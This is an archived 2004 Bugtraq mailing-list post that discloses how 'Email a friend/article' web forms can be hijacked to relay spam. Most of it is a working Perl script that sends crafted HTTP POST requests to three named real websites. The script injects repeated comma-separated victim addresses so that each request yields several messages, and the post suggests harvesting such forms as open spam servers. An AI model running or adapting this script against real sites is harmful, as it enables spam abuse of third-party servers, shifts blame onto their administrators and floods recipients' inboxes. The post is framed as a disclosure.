Spammers can hide behind 'Email a friend/article' scripts.

cyber_flash_at_hotmail.com
Date: 04/26/04

  • Next message: Imperva Application Defense Center: "RE: New Paper - SQL Injection Signatures Evasion" 
    Date: 26 Apr 2004 20:26:13 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    # Author: Vengy
    # Email: cyber_flash@hotmail.com
    # Description: Spammers can hide behind 'Email a friend/article' scripts.
    #
    #
    # How it works:
    # -------------
    # This simple perl script will send just 3 identical fake spam messages
    # to 'yourname@yourdomain.com' from 'vengy@spam4u.com'. Example:
    #
    # +------------------------------------------+
    # | From : <vengy@spam4u.com> |
    # | Sent : Friday, April 9, 2004 6:34 PM |
    # | To : <yourname@yourdomain.com> |
    # | Subject : To spam or not to spam! |
    # | |
    # | Urgent! Call me: 1-900-EAT-SPAM |
    # | |
    # | www.spammmmmm.com |
    # +------------------------------------------+
    #
    # If a spammer or victim sends junk email directly to their ISP SMTP servers,
    # network Admins can trace back the connection and deal with the problem.
    #
    # But, the 'Email a friend' technique will deflect a significant portion of
    # the complaints away from spammers and towards the administrators of the hijacked host.
    #
    # There are possibly zillions of insecure 'Email a friend/article' on the web! (just google it)
    # Many allow multiple unrestricted emails to be sent separated by comma's.
    # (Imagine an automated harvester to compile a list of open spam servers!)
    #
    # For demonstrational purposes, here are two random servers:
    #
    #
    # Host: Outgoing SMTP Server: Email Originator:
    # ===== ===================== =================
    # www.wcqp.com relay.westlaw.com eg-fsite-b12.ecom.tlrg.com
    # edinburghnews.scotsman.com macdui.scotsman.com 80-75-65-10.eqsn.net
    #
    #
    # Notes: Relaying is denied (550) when connecting directly to the SMTP servers.
    # However, by using email forms, the Originator has access to send messages!
    #
    #
    # Arguments to Send_SPAM are:
    # ---------------------------
    # 1. Webserver.
    # 2. Email script.
    # 3. Host.
    # 4. Content.
    # 5. Email address of Victim.
    # 6. Number of copies to send.

    use IO::Socket::INET qw(CRLF);

    my $victim = 'yourname@yourdomain.com';
    my $copies = 3;
    my $sender_email = 'vengy@spam4u.com';
    my $sender_name = 'vengy';
    my $subject = 'To+spam+or+not+to+spam%21';
    my $body = 'Urgent!+Call+me:+1-900-EAT-SPAM';
    my $spam_url = 'http%3A%2F%2Fwww.spammmmmm.com';

    ################## Spam Server #1 ##################
    Send_SPAM('www.wcqp.com',
              'FSL5CS/Custom/emailPageConfirm.asp',
              'www.wcqp.com',
              'friend_name='.("%2C" x ($copies-1)).'&friend_email='.$victim.'&your_name='.$sender_name.'&your_email='.$sender_email.'&subject='.$subject.'&comments='.$body.'&url='.$spam_url,
               $victim,
               $copies);
              
    ################## Spam Server #2 ##################
    Send_SPAM('216.55.105.36.hera.net',
              'recommend.php/en/',
              'toolbox.academicpriority.co.il',
              'recommend='.$spam_url.'&friendsemail='.$victim.'&youremail='.$sender_email.'&yourname='.$sender_name,
              $victim,
              1);

    ################## Spam Server #3 ##################
    Send_SPAM('www.scotsman.com',
              'email2.cfm',
              'edinburghnews.scotsman.com',
              'id=364942004&referringtemplate='.$spam_url.'&referringquerystring=id%3D&recipientemail='.$victim.'&sendername='.$sender_name.'&senderemail='.$sender_email.'&subject='.$subject.'&message='.$body,
              $victim,
              $copies);
              

    sub Send_SPAM {
        my ($server,$url,$host,$content,$email_to,$email_num) = @_;
          
        $repeat_email_to = ($email_to."%2C") x $email_num;
        substr($repeat_email_to,-3,3) = "";
        $content =~ s/$email_to/$repeat_email_to/;
        
        $sock = IO::Socket::INET->new(PeerAddr => $server ,PeerPort => 'http(80)',Proto => 'tcp');
        die "$!" unless $sock;
        $sock->autoflush();
        
        print $sock 'POST /'.$url.' HTTP/1.1',CRLF,
                    'Host: '.$host,CRLF,
                    'Content-Type: application/x-www-form-urlencoded',CRLF,
                    'Content-Length: '.length($content),CRLF,
                    'Connection: Keep-Alive',CRLF,
                    'Cache-Control: no-cache',CRLF x 2,
                    $content;
                    
        close $sock;
        
        print "Sent SPAM from server: $server\n";
    }

  • Next message: Imperva Application Defense Center: "RE: New Paper - SQL Injection Signatures Evasion"